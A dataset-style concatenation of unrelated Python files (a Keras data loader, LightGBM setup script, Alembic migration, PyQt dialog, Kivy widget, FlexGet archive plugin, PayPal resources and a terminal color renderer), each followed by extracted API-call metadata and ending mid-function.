'alpaca_trade_api.REST', (['ALPACA_API_KEY', 'ALPACA_SECRET_KEY', 'ALPACA_BASE_URL'], {'api_version': '"""v2"""'}), "(ALPACA_API_KEY, ALPACA_SECRET_KEY, ALPACA_BASE_URL,\n api_version='v2')\n", (535, 609), False, 'import alpaca_trade_api\n'), ((2035, 2073), 'faust.Worker', 'Worker', ([], {'app': 'app', 'loglevel': 'logging.INFO'}), '(app=app, loglevel=logging.INFO)\n', (2041, 2073), False, 'from faust import Worker\n'), ((992, 1013), 'datetime.timedelta', 'timedelta', ([], {'seconds': '(10)'}), '(seconds=10)\n', (1001, 1013), False, 'from datetime import timedelta\n'), ((1023, 1044), 'datetime.timedelta', 'timedelta', ([], {'seconds': '(60)'}), '(seconds=60)\n', (1032, 1044), False, 'from datetime import timedelta\n'), ((1948, 1992), 'logging.info', 'logging.info', (['f"""Send Order {key} to {order}"""'], {}), "(f'Send Order {key} to {order}')\n", (1960, 1992), False, 'import logging\n')]
|
# Copyright 2019 Graphcore Ltd.
"""
Dataset reader from Datalogue keras-attention tutorial.
References:
https://github.com/datalogue/keras-attention
https://medium.com/datalogue
"""
import json
import csv
import random
import numpy as np
# from keras.utils.np_utils import to_categorical
INPUT_PADDING = 50
OUTPUT_PADDING = 100
class Vocabulary(object):
def __init__(self, vocabulary_file, padding=None):
"""
Creates a vocabulary from a file
:param vocabulary_file: the path to the vocabulary
"""
self.vocabulary_file = vocabulary_file
with open(vocabulary_file, 'r') as f:
self.vocabulary = json.load(f)
self.padding = padding
self.reverse_vocabulary = {v: k for k, v in self.vocabulary.items()}
def start_id(self):
return self.vocabulary['<sot>']
def end_id(self):
return self.vocabulary['<eot>']
def size(self):
"""
Gets the size of the vocabulary
"""
return len(self.vocabulary.keys())
def string_to_int(self, text):
"""
        Converts a string into its character integer
representation
:param text: text to convert
"""
characters = list(text)
integers = []
if self.padding and len(characters) >= self.padding:
# truncate if too long
characters = characters[:self.padding-1]
characters.append('<eot>')
for c in characters:
if c in self.vocabulary:
integers.append(self.vocabulary[c])
else:
integers.append(self.vocabulary['<unk>'])
# pad:
if self.padding and len(integers) < self.padding:
integers.extend(
[self.vocabulary['<unk>']] * (self.padding - len(integers))
)
if len(integers) != self.padding:
print(text)
            raise AttributeError('Encoded length does not match the padding length.')
return integers
def int_to_string(self, integers):
"""
        Decodes a list of integers
        into its string representation
"""
characters = []
for i in integers:
characters.append(self.reverse_vocabulary[i])
return characters
class Data(object):
def __init__(self, file_name, input_vocabulary, output_vocabulary):
"""
Creates an object that gets data from a file
:param file_name: name of the file to read from
        :param input_vocabulary: the Vocabulary object for the inputs
        :param output_vocabulary: the Vocabulary object for the targets
        """
self.input_vocabulary = input_vocabulary
self.output_vocabulary = output_vocabulary
self.file_name = file_name
def load(self):
"""
Loads data from a file
"""
self.inputs = []
self.targets = []
with open(self.file_name, 'r') as f:
reader = csv.reader(f)
for row in reader:
self.inputs.append(row[0])
self.targets.append(row[1])
def transform(self):
"""
Transforms the data as necessary
"""
# @TODO: use `pool.map_async` here?
self.inputs = np.array(list(
map(self.input_vocabulary.string_to_int, self.inputs)))
self.targets = np.array(list(
map(self.output_vocabulary.string_to_int, self.targets)))
assert len(self.inputs.shape) == 2, 'Inputs could not properly be encoded'
assert len(self.targets.shape) == 2, 'Targets could not properly be encoded'
def generator(self, batch_size):
"""
Creates a generator that can be used in `model.fit_generator()`
Batches are generated randomly.
:param batch_size: the number of instances to include per batch
"""
instance_id = range(len(self.inputs))
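        # draw a fresh random batch of row indices on every iteration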
while True:
try:
batch_ids = random.sample(instance_id, batch_size)
yield (np.array(self.inputs[batch_ids], dtype=int),
np.array(self.targets[batch_ids]))
except Exception as e:
print('EXCEPTION OMG')
print(e)
yield None, None
if __name__ == '__main__':
input_vocab = Vocabulary('../data/human_vocab.json', padding=50)
output_vocab = Vocabulary('../data/machine_vocab.json', padding=12)
ds = Data('../data/fake.csv', input_vocab, output_vocab)
ds.load()
ds.transform()
print(ds.inputs.shape)
print(ds.targets.shape)
g = ds.generator(32)
print(ds.inputs[[5, 10, 12]].shape)
print(ds.targets[[5, 10, 12]].shape)
|
[
"random.sample",
"json.load",
"csv.reader",
"numpy.array"
] |
[((683, 695), 'json.load', 'json.load', (['f'], {}), '(f)\n', (692, 695), False, 'import json\n'), ((3124, 3137), 'csv.reader', 'csv.reader', (['f'], {}), '(f)\n', (3134, 3137), False, 'import csv\n'), ((4146, 4184), 'random.sample', 'random.sample', (['instance_id', 'batch_size'], {}), '(instance_id, batch_size)\n', (4159, 4184), False, 'import random\n'), ((4208, 4251), 'numpy.array', 'np.array', (['self.inputs[batch_ids]'], {'dtype': 'int'}), '(self.inputs[batch_ids], dtype=int)\n', (4216, 4251), True, 'import numpy as np\n'), ((4276, 4309), 'numpy.array', 'np.array', (['self.targets[batch_ids]'], {}), '(self.targets[batch_ids])\n', (4284, 4309), True, 'import numpy as np\n')]
|
# coding: utf-8
# pylint: disable=invalid-name, exec-used
"""Setup lightgbm package."""
from __future__ import absolute_import
import os
import sys
from setuptools import find_packages, setup
sys.path.insert(0, '.')
CURRENT_DIR = os.path.dirname(__file__)
libpath_py = os.path.join(CURRENT_DIR, 'lightgbm/libpath.py')
libpath = {'__file__': libpath_py}
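# Execute libpath.py in this namespace so find_lib_path() becomes available below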
exec(compile(open(libpath_py, "rb").read(), libpath_py, 'exec'), libpath, libpath)
LIB_PATH = [os.path.relpath(path, CURRENT_DIR) for path in libpath['find_lib_path']()]
print("Install lib_lightgbm from: %s" % LIB_PATH)
setup(name='lightgbm',
version=0.2,
description="LightGBM Python Package",
install_requires=[
'numpy',
'scipy',
],
maintainer='<NAME>',
maintainer_email='<EMAIL>',
zip_safe=False,
packages=find_packages(),
include_package_data=True,
data_files=[('lightgbm', LIB_PATH)],
url='https://github.com/Microsoft/LightGBM')
|
[
"os.path.dirname",
"sys.path.insert",
"os.path.relpath",
"os.path.join",
"setuptools.find_packages"
] |
[((195, 218), 'sys.path.insert', 'sys.path.insert', (['(0)', '"""."""'], {}), "(0, '.')\n", (210, 218), False, 'import sys\n'), ((234, 259), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (249, 259), False, 'import os\n'), ((274, 322), 'os.path.join', 'os.path.join', (['CURRENT_DIR', '"""lightgbm/libpath.py"""'], {}), "(CURRENT_DIR, 'lightgbm/libpath.py')\n", (286, 322), False, 'import os\n'), ((454, 488), 'os.path.relpath', 'os.path.relpath', (['path', 'CURRENT_DIR'], {}), '(path, CURRENT_DIR)\n', (469, 488), False, 'import os\n'), ((838, 853), 'setuptools.find_packages', 'find_packages', ([], {}), '()\n', (851, 853), False, 'from setuptools import find_packages, setup\n')]
|
"""entries table
Revision ID: 11848f9f4372
Revises: e<PASSWORD>
Create Date: 2021-05-20 13:39:16.441005
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '11848f9f4372'
down_revision = 'eb<PASSWORD>d363477'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('handover',
sa.Column('ho_id', sa.Integer(), nullable=False),
sa.Column('ticket', sa.String(length=64), nullable=False),
sa.Column('ticket_type', sa.String(length=64), nullable=False),
sa.Column('servers', sa.String(length=300), nullable=False),
sa.Column('platform', sa.Integer(), nullable=True),
sa.Column('steps', sa.String(length=300), nullable=False),
sa.Column('next_steps', sa.String(length=300), nullable=False),
sa.Column('chat_url', sa.String(length=300), nullable=False),
sa.Column('owner', sa.Integer(), nullable=True),
sa.Column('old_owners', sa.String(length=300), nullable=False),
sa.Column('is_active', sa.Boolean(), nullable=True),
sa.PrimaryKeyConstraint('ho_id')
)
op.create_index(op.f('ix_handover_chat_url'), 'handover', ['chat_url'], unique=False)
op.create_index(op.f('ix_handover_next_steps'), 'handover', ['next_steps'], unique=False)
op.create_index(op.f('ix_handover_old_owners'), 'handover', ['old_owners'], unique=False)
op.create_index(op.f('ix_handover_servers'), 'handover', ['servers'], unique=False)
op.create_index(op.f('ix_handover_steps'), 'handover', ['steps'], unique=False)
op.create_index(op.f('ix_handover_ticket'), 'handover', ['ticket'], unique=False)
op.create_index(op.f('ix_handover_ticket_type'), 'handover', ['ticket_type'], unique=False)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_index(op.f('ix_handover_ticket_type'), table_name='handover')
op.drop_index(op.f('ix_handover_ticket'), table_name='handover')
op.drop_index(op.f('ix_handover_steps'), table_name='handover')
op.drop_index(op.f('ix_handover_servers'), table_name='handover')
op.drop_index(op.f('ix_handover_old_owners'), table_name='handover')
op.drop_index(op.f('ix_handover_next_steps'), table_name='handover')
op.drop_index(op.f('ix_handover_chat_url'), table_name='handover')
op.drop_table('handover')
# ### end Alembic commands ###
|
[
"alembic.op.drop_table",
"alembic.op.f",
"sqlalchemy.PrimaryKeyConstraint",
"sqlalchemy.Boolean",
"sqlalchemy.String",
"sqlalchemy.Integer"
] |
[((2396, 2421), 'alembic.op.drop_table', 'op.drop_table', (['"""handover"""'], {}), "('handover')\n", (2409, 2421), False, 'from alembic import op\n'), ((1103, 1135), 'sqlalchemy.PrimaryKeyConstraint', 'sa.PrimaryKeyConstraint', (['"""ho_id"""'], {}), "('ho_id')\n", (1126, 1135), True, 'import sqlalchemy as sa\n'), ((1162, 1190), 'alembic.op.f', 'op.f', (['"""ix_handover_chat_url"""'], {}), "('ix_handover_chat_url')\n", (1166, 1190), False, 'from alembic import op\n'), ((1252, 1282), 'alembic.op.f', 'op.f', (['"""ix_handover_next_steps"""'], {}), "('ix_handover_next_steps')\n", (1256, 1282), False, 'from alembic import op\n'), ((1346, 1376), 'alembic.op.f', 'op.f', (['"""ix_handover_old_owners"""'], {}), "('ix_handover_old_owners')\n", (1350, 1376), False, 'from alembic import op\n'), ((1440, 1467), 'alembic.op.f', 'op.f', (['"""ix_handover_servers"""'], {}), "('ix_handover_servers')\n", (1444, 1467), False, 'from alembic import op\n'), ((1528, 1553), 'alembic.op.f', 'op.f', (['"""ix_handover_steps"""'], {}), "('ix_handover_steps')\n", (1532, 1553), False, 'from alembic import op\n'), ((1612, 1638), 'alembic.op.f', 'op.f', (['"""ix_handover_ticket"""'], {}), "('ix_handover_ticket')\n", (1616, 1638), False, 'from alembic import op\n'), ((1698, 1729), 'alembic.op.f', 'op.f', (['"""ix_handover_ticket_type"""'], {}), "('ix_handover_ticket_type')\n", (1702, 1729), False, 'from alembic import op\n'), ((1912, 1943), 'alembic.op.f', 'op.f', (['"""ix_handover_ticket_type"""'], {}), "('ix_handover_ticket_type')\n", (1916, 1943), False, 'from alembic import op\n'), ((1986, 2012), 'alembic.op.f', 'op.f', (['"""ix_handover_ticket"""'], {}), "('ix_handover_ticket')\n", (1990, 2012), False, 'from alembic import op\n'), ((2055, 2080), 'alembic.op.f', 'op.f', (['"""ix_handover_steps"""'], {}), "('ix_handover_steps')\n", (2059, 2080), False, 'from alembic import op\n'), ((2123, 2150), 'alembic.op.f', 'op.f', (['"""ix_handover_servers"""'], {}), "('ix_handover_servers')\n", (2127, 2150), False, 'from alembic import op\n'), ((2193, 2223), 'alembic.op.f', 'op.f', (['"""ix_handover_old_owners"""'], {}), "('ix_handover_old_owners')\n", (2197, 2223), False, 'from alembic import op\n'), ((2266, 2296), 'alembic.op.f', 'op.f', (['"""ix_handover_next_steps"""'], {}), "('ix_handover_next_steps')\n", (2270, 2296), False, 'from alembic import op\n'), ((2339, 2367), 'alembic.op.f', 'op.f', (['"""ix_handover_chat_url"""'], {}), "('ix_handover_chat_url')\n", (2343, 2367), False, 'from alembic import op\n'), ((441, 453), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (451, 453), True, 'import sqlalchemy as sa\n'), ((496, 516), 'sqlalchemy.String', 'sa.String', ([], {'length': '(64)'}), '(length=64)\n', (505, 516), True, 'import sqlalchemy as sa\n'), ((564, 584), 'sqlalchemy.String', 'sa.String', ([], {'length': '(64)'}), '(length=64)\n', (573, 584), True, 'import sqlalchemy as sa\n'), ((628, 649), 'sqlalchemy.String', 'sa.String', ([], {'length': '(300)'}), '(length=300)\n', (637, 649), True, 'import sqlalchemy as sa\n'), ((694, 706), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (704, 706), True, 'import sqlalchemy as sa\n'), ((747, 768), 'sqlalchemy.String', 'sa.String', ([], {'length': '(300)'}), '(length=300)\n', (756, 768), True, 'import sqlalchemy as sa\n'), ((815, 836), 'sqlalchemy.String', 'sa.String', ([], {'length': '(300)'}), '(length=300)\n', (824, 836), True, 'import sqlalchemy as sa\n'), ((881, 902), 'sqlalchemy.String', 'sa.String', ([], {'length': '(300)'}), '(length=300)\n', (890, 902), True, 'import sqlalchemy as sa\n'), ((944, 956), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (954, 956), True, 'import sqlalchemy as sa\n'), ((1002, 1023), 'sqlalchemy.String', 'sa.String', ([], {'length': '(300)'}), '(length=300)\n', (1011, 1023), True, 'import sqlalchemy as sa\n'), ((1069, 1081), 'sqlalchemy.Boolean', 'sa.Boolean', ([], {}), '()\n', (1079, 1081), True, 'import sqlalchemy as sa\n')]
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'float_display_dialog.ui'
#
# Created by: PyQt5 UI code generator 5.9.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_FloatDisplayDialog(object):
def setupUi(self, FloatDisplayDialog):
FloatDisplayDialog.setObjectName("FloatDisplayDialog")
FloatDisplayDialog.setWindowModality(QtCore.Qt.WindowModal)
FloatDisplayDialog.resize(398, 129)
FloatDisplayDialog.setModal(True)
self.layoutWidget = QtWidgets.QWidget(FloatDisplayDialog)
self.layoutWidget.setGeometry(QtCore.QRect(17, 13, 371, 105))
self.layoutWidget.setObjectName("layoutWidget")
self.verticalLayout = QtWidgets.QVBoxLayout(self.layoutWidget)
self.verticalLayout.setContentsMargins(0, 0, 0, 0)
self.verticalLayout.setObjectName("verticalLayout")
self.formLayout = QtWidgets.QFormLayout()
self.formLayout.setObjectName("formLayout")
self.floatPrecisionLabel = QtWidgets.QLabel(self.layoutWidget)
self.floatPrecisionLabel.setObjectName("floatPrecisionLabel")
self.formLayout.setWidget(0, QtWidgets.QFormLayout.LabelRole, self.floatPrecisionLabel)
self.floatDisplayTypeLabel = QtWidgets.QLabel(self.layoutWidget)
self.floatDisplayTypeLabel.setObjectName("floatDisplayTypeLabel")
self.formLayout.setWidget(1, QtWidgets.QFormLayout.LabelRole, self.floatDisplayTypeLabel)
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
self.fix_radioButton = QtWidgets.QRadioButton(self.layoutWidget)
self.fix_radioButton.setChecked(True)
self.fix_radioButton.setObjectName("fix_radioButton")
self.horizontalLayout.addWidget(self.fix_radioButton)
self.sci_radioButton = QtWidgets.QRadioButton(self.layoutWidget)
self.sci_radioButton.setObjectName("sci_radioButton")
self.horizontalLayout.addWidget(self.sci_radioButton)
self.formLayout.setLayout(1, QtWidgets.QFormLayout.FieldRole, self.horizontalLayout)
self.floatPrecision_spinBox = QtWidgets.QSpinBox(self.layoutWidget)
self.floatPrecision_spinBox.setObjectName("floatPrecision_spinBox")
self.formLayout.setWidget(0, QtWidgets.QFormLayout.FieldRole, self.floatPrecision_spinBox)
self.verticalLayout.addLayout(self.formLayout)
self.buttonBox = QtWidgets.QDialogButtonBox(self.layoutWidget)
self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)
self.buttonBox.setObjectName("buttonBox")
self.verticalLayout.addWidget(self.buttonBox)
self.retranslateUi(FloatDisplayDialog)
self.buttonBox.accepted.connect(FloatDisplayDialog.accept)
self.buttonBox.rejected.connect(FloatDisplayDialog.reject)
QtCore.QMetaObject.connectSlotsByName(FloatDisplayDialog)
def retranslateUi(self, FloatDisplayDialog):
_translate = QtCore.QCoreApplication.translate
FloatDisplayDialog.setWindowTitle(_translate("FloatDisplayDialog", "Variable Name and Type"))
self.floatPrecisionLabel.setText(_translate("FloatDisplayDialog", "Float Precision"))
self.floatDisplayTypeLabel.setText(_translate("FloatDisplayDialog", "Float Display Type"))
self.fix_radioButton.setText(_translate("FloatDisplayDialog", "Fixed"))
self.sci_radioButton.setText(_translate("FloatDisplayDialog", "Scientific"))
|
[
"PyQt5.QtWidgets.QLabel",
"PyQt5.QtWidgets.QWidget",
"PyQt5.QtWidgets.QRadioButton",
"PyQt5.QtCore.QRect",
"PyQt5.QtWidgets.QHBoxLayout",
"PyQt5.QtWidgets.QVBoxLayout",
"PyQt5.QtCore.QMetaObject.connectSlotsByName",
"PyQt5.QtWidgets.QDialogButtonBox",
"PyQt5.QtWidgets.QSpinBox",
"PyQt5.QtWidgets.QFormLayout"
] |
[((577, 614), 'PyQt5.QtWidgets.QWidget', 'QtWidgets.QWidget', (['FloatDisplayDialog'], {}), '(FloatDisplayDialog)\n', (594, 614), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((771, 811), 'PyQt5.QtWidgets.QVBoxLayout', 'QtWidgets.QVBoxLayout', (['self.layoutWidget'], {}), '(self.layoutWidget)\n', (792, 811), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((957, 980), 'PyQt5.QtWidgets.QFormLayout', 'QtWidgets.QFormLayout', ([], {}), '()\n', (978, 980), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1068, 1103), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.layoutWidget'], {}), '(self.layoutWidget)\n', (1084, 1103), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1307, 1342), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.layoutWidget'], {}), '(self.layoutWidget)\n', (1323, 1342), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1547, 1570), 'PyQt5.QtWidgets.QHBoxLayout', 'QtWidgets.QHBoxLayout', ([], {}), '()\n', (1568, 1570), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1666, 1707), 'PyQt5.QtWidgets.QRadioButton', 'QtWidgets.QRadioButton', (['self.layoutWidget'], {}), '(self.layoutWidget)\n', (1688, 1707), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1909, 1950), 'PyQt5.QtWidgets.QRadioButton', 'QtWidgets.QRadioButton', (['self.layoutWidget'], {}), '(self.layoutWidget)\n', (1931, 1950), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2206, 2243), 'PyQt5.QtWidgets.QSpinBox', 'QtWidgets.QSpinBox', (['self.layoutWidget'], {}), '(self.layoutWidget)\n', (2224, 2243), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2499, 2544), 'PyQt5.QtWidgets.QDialogButtonBox', 'QtWidgets.QDialogButtonBox', (['self.layoutWidget'], {}), '(self.layoutWidget)\n', (2525, 2544), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3006, 3063), 'PyQt5.QtCore.QMetaObject.connectSlotsByName', 'QtCore.QMetaObject.connectSlotsByName', (['FloatDisplayDialog'], {}), '(FloatDisplayDialog)\n', (3043, 3063), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((653, 683), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(17)', '(13)', '(371)', '(105)'], {}), '(17, 13, 371, 105)\n', (665, 683), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n')]
|
#!python
from kivy.uix.widget import Widget
from kivy.properties import NumericProperty, ObjectProperty
from kivy.base import EventLoop
from kivy.lang import Builder
class Scaler(Widget):
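    """Scales its children by `scale` on the canvas and remaps touch events back into the scaled space."""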
scale = NumericProperty(2)
container = ObjectProperty(None)
def __init__(self, **kwargs):
Builder.load_string('''
<Scaler>:
container: container
canvas.before:
PushMatrix
Scale:
scale: root.scale
canvas.after:
PopMatrix
FloatLayout:
id: container
size: root.width / root.scale, root.height / root.scale
''')
super(Scaler, self).__init__(**kwargs)
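        # Register as an input post-processor so process() can rescale incoming touch events.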
EventLoop.add_postproc_module(self)
def get_parent_window(self):
return self.container
def add_widget(self, widget):
if self.container is not None:
return self.container.add_widget(widget)
return super(Scaler, self).add_widget(widget)
def remove_widget(self, widget):
if self.container is not None:
return self.container.remove_widget(widget)
return super(Scaler, self).remove_widget(widget)
def process_to_local(self, x, y, relative=False):
if x is None:
return None, None
s = float(self.scale)
return x / s, y / s
def process(self, events):
transform = self.process_to_local
transformed = []
for etype, event in events:
# you might have a move and up event in the same process
# then avoid the double-transformation
if event in transformed:
continue
transformed.append(event)
event.sx, event.sy = transform(event.sx, event.sy)
if etype == 'begin':
event.osx, event.osy = transform(event.osx, event.osy)
else:
# update the delta
event.dsx = event.sx - event.psx
event.dsy = event.sy - event.psy
return events
|
[
"kivy.base.EventLoop.add_postproc_module",
"kivy.properties.NumericProperty",
"kivy.lang.Builder.load_string",
"kivy.properties.ObjectProperty"
] |
[((201, 219), 'kivy.properties.NumericProperty', 'NumericProperty', (['(2)'], {}), '(2)\n', (216, 219), False, 'from kivy.properties import NumericProperty, ObjectProperty\n'), ((236, 256), 'kivy.properties.ObjectProperty', 'ObjectProperty', (['None'], {}), '(None)\n', (250, 256), False, 'from kivy.properties import NumericProperty, ObjectProperty\n'), ((378, 675), 'kivy.lang.Builder.load_string', 'Builder.load_string', (['"""\n<Scaler>:\n container: container\n canvas.before:\n PushMatrix\n Scale:\n scale: root.scale\n\n canvas.after:\n PopMatrix\n\n FloatLayout:\n id: container\n size: root.width / root.scale, root.height / root.scale\n"""'], {}), '(\n """\n<Scaler>:\n container: container\n canvas.before:\n PushMatrix\n Scale:\n scale: root.scale\n\n canvas.after:\n PopMatrix\n\n FloatLayout:\n id: container\n size: root.width / root.scale, root.height / root.scale\n"""\n )\n', (397, 675), False, 'from kivy.lang import Builder\n'), ((722, 757), 'kivy.base.EventLoop.add_postproc_module', 'EventLoop.add_postproc_module', (['self'], {}), '(self)\n', (751, 757), False, 'from kivy.base import EventLoop\n')]
|
import logging
import re
from flexget import plugin
from flexget.entry import Entry
from flexget.event import event
from flexget.manager import Session
from . import db
log = logging.getLogger('archive')
class Archive:
"""
    Archives all new items into the database, where they can later be searched and injected.
    Entries are stored in the state they are in at the exit phase, so any task cleanup (title
    normalization etc.) is persisted to the database. This may, however, make injecting them
    back into the original task behave incorrectly.
"""
schema = {'oneOf': [{'type': 'boolean'}, {'type': 'array', 'items': {'type': 'string'}}]}
def on_task_learn(self, task, config):
"""Add new entries into archive. We use learn phase in case the task corrects title or url via some plugins."""
if isinstance(config, bool):
tag_names = []
else:
tag_names = config
tags = []
for tag_name in set(tag_names):
tags.append(db.get_tag(tag_name, task.session))
count = 0
processed = []
for entry in task.entries + task.rejected + task.failed:
# I think entry can be in multiple of those lists .. not sure though!
if entry in processed:
continue
else:
processed.append(entry)
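            # Look for an existing archive entry with the same title and url.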
ae = (
task.session.query(db.ArchiveEntry)
.filter(db.ArchiveEntry.title == entry['title'])
.filter(db.ArchiveEntry.url == entry['url'])
.first()
)
if ae:
# add (missing) sources
source = db.get_source(task.name, task.session)
if source not in ae.sources:
log.debug('Adding `%s` into `%s` sources' % (task.name, ae))
ae.sources.append(source)
# add (missing) tags
for tag_name in tag_names:
atag = db.get_tag(tag_name, task.session)
if atag not in ae.tags:
log.debug('Adding tag %s into %s' % (tag_name, ae))
ae.tags.append(atag)
else:
# create new archive entry
ae = db.ArchiveEntry()
ae.title = entry['title']
ae.url = entry['url']
if 'description' in entry:
ae.description = entry['description']
ae.task = task.name
ae.sources.append(db.get_source(task.name, task.session))
if tags:
# note, we're extending empty list
ae.tags.extend(tags)
log.debug('Adding `%s` with %i tags to archive' % (ae, len(tags)))
task.session.add(ae)
count += 1
if count:
log.verbose('Added %i new entries to archive' % count)
def on_task_abort(self, task, config):
"""
Archive even on task abort, except if the abort has happened before session
was started.
"""
if task.session is not None:
self.on_task_learn(task, config)
class UrlrewriteArchive:
"""
Provides capability to rewrite urls from archive or make searches with discover.
"""
entry_map = {'title': 'title', 'url': 'url', 'description': 'description'}
schema = {'oneOf': [{'type': 'boolean'}, {'type': 'array', 'items': {'type': 'string'}}]}
def search(self, task, entry, config=None):
"""Search plugin API method"""
session = Session()
entries = set()
if isinstance(config, bool):
tag_names = None
else:
tag_names = config
try:
for query in entry.get('search_strings', [entry['title']]):
# clean some characters out of the string for better results
query = re.sub(r'[ \(\)]+', ' ', query).strip()
log.debug('looking for `%s` config: %s' % (query, config))
for archive_entry in db.search(session, query, tags=tag_names, desc=True):
log.debug('rewrite search result: %s' % archive_entry)
entry = Entry()
entry.update_using_map(self.entry_map, archive_entry, ignore_none=True)
if entry.isvalid():
entries.add(entry)
finally:
session.close()
log.debug('found %i entries' % len(entries))
return entries
@event('plugin.register')
def register_plugin():
plugin.register(Archive, 'archive', api_ver=2)
plugin.register(UrlrewriteArchive, 'flexget_archive', interfaces=['search'], api_ver=2)
|
[
"flexget.entry.Entry",
"flexget.event.event",
"flexget.manager.Session",
"flexget.plugin.register",
"re.sub",
"logging.getLogger"
] |
[((178, 206), 'logging.getLogger', 'logging.getLogger', (['"""archive"""'], {}), "('archive')\n", (195, 206), False, 'import logging\n'), ((4535, 4559), 'flexget.event.event', 'event', (['"""plugin.register"""'], {}), "('plugin.register')\n", (4540, 4559), False, 'from flexget.event import event\n'), ((4587, 4633), 'flexget.plugin.register', 'plugin.register', (['Archive', '"""archive"""'], {'api_ver': '(2)'}), "(Archive, 'archive', api_ver=2)\n", (4602, 4633), False, 'from flexget import plugin\n'), ((4638, 4729), 'flexget.plugin.register', 'plugin.register', (['UrlrewriteArchive', '"""flexget_archive"""'], {'interfaces': "['search']", 'api_ver': '(2)'}), "(UrlrewriteArchive, 'flexget_archive', interfaces=['search'],\n api_ver=2)\n", (4653, 4729), False, 'from flexget import plugin\n'), ((3588, 3597), 'flexget.manager.Session', 'Session', ([], {}), '()\n', (3595, 3597), False, 'from flexget.manager import Session\n'), ((4228, 4235), 'flexget.entry.Entry', 'Entry', ([], {}), '()\n', (4233, 4235), False, 'from flexget.entry import Entry\n'), ((3919, 3951), 're.sub', 're.sub', (['"""[ \\\\(\\\\)]+"""', '""" """', 'query'], {}), "('[ \\\\(\\\\)]+', ' ', query)\n", (3925, 3951), False, 'import re\n')]
|
from cached import Resource
from lib.paypal.client import get_client
from lib.paypal.forms import (CheckPermission, GetPermissionToken,
GetPermissionURL)
class GetPermissionURLResource(Resource):
class Meta(Resource.Meta):
resource_name = 'permission-url'
list_allowed_methods = ['post']
form = GetPermissionURL
method = 'get_permission_url'
class CheckPermissionResource(Resource):
class Meta(Resource.Meta):
resource_name = 'permission-check'
list_allowed_methods = ['post']
form = CheckPermission
method = 'check_permission'
class GetPermissionTokenResource(Resource):
class Meta(Resource.Meta):
resource_name = 'permission-token'
list_allowed_methods = ['post']
def obj_create(self, bundle, request, **kwargs):
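        """Validate the form, fetch a permanent permission token/secret from PayPal, and store them on the seller."""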
form = GetPermissionToken(bundle.data)
if not form.is_valid():
raise self.form_errors(form)
paypal = get_client()
result = paypal.get_permission_token(*form.args())
seller = form.cleaned_data['seller']
seller.token = result['token']
seller.secret = result['secret']
seller.save()
bundle.obj = seller
return bundle
def dehydrate(self, bundle):
return {'token': bundle.obj.token_exists,
'secret': bundle.obj.secret_exists}
|
[
"lib.paypal.forms.GetPermissionToken",
"lib.paypal.client.get_client"
] |
[((867, 898), 'lib.paypal.forms.GetPermissionToken', 'GetPermissionToken', (['bundle.data'], {}), '(bundle.data)\n', (885, 898), False, 'from lib.paypal.forms import CheckPermission, GetPermissionToken, GetPermissionURL\n'), ((990, 1002), 'lib.paypal.client.get_client', 'get_client', ([], {}), '()\n', (1000, 1002), False, 'from lib.paypal.client import get_client\n')]
|
from typing import Union, ClassVar
import sty
from colour import Color
from autopalette.colormatch import ColorPoint, AnsiCodeType
from autopalette.palette import Ansi256Palette, Ansi16Palette, Ansi8Palette
from autopalette.utils import rgb_to_RGB255
OptionalColor = Union['Color', None]
OptionalPalette = ClassVar['BasePalette']
OptionalRenderer = ClassVar['Renderer']
class BaseRenderer(object):
def __init__(self,
palette: OptionalPalette = None,
fallback: OptionalPalette = None) -> None:
self.palette = palette if palette else Ansi256Palette()
self.fallback = fallback if fallback else Ansi256Palette()
def render(self, text, fg: Color, bg: OptionalColor = None):
raise NotImplementedError()
def is_bright(self, color: Color):
if color.get_saturation() == 0 \
and color.get_luminance() == 1:
return True
if color.get_luminance() > 0.7:
return True
if color.get_saturation() >= 0.3 \
and color.get_luminance() >= 0.3:
return True
return False
class Ansi256Renderer(BaseRenderer):
def render(self, text, fg: Color, bg: OptionalColor = None, ansi_reset=False):
if ansi_reset:
return text
fg = self.palette.match(fg, ansi=True)
if fg.ansi == '' or fg.ansi is None:
fg = self.fallback.match(fg.target, ansi=True)
if bg:
bg = self.palette.match(bg, ansi=True)
if bg.ansi == '' or bg.ansi is None:
bg = self.fallback.match(bg.target, ansi=True)
return self._render(text, fg=fg, bg=bg)
def _render(self, text, fg: ColorPoint, bg: ColorPoint = None):
out = ''
out += sty.fg(fg.ansi)
if bg:
out += sty.bg(bg.ansi)
out += text
out += sty.rs.all
return out
def is_bright(self, color: Color):
ansi = self.palette.match(color).ansi
if ansi < 16:
if ansi in (0, 1, 2, 3, 4, 5, 6, 8):
return False
return True
return super().is_bright(color)
def bg(self, color: Color) -> str:
return sty.bg(self.palette.match(color, ansi=True).ansi)
def fg(self, color: Color) -> str:
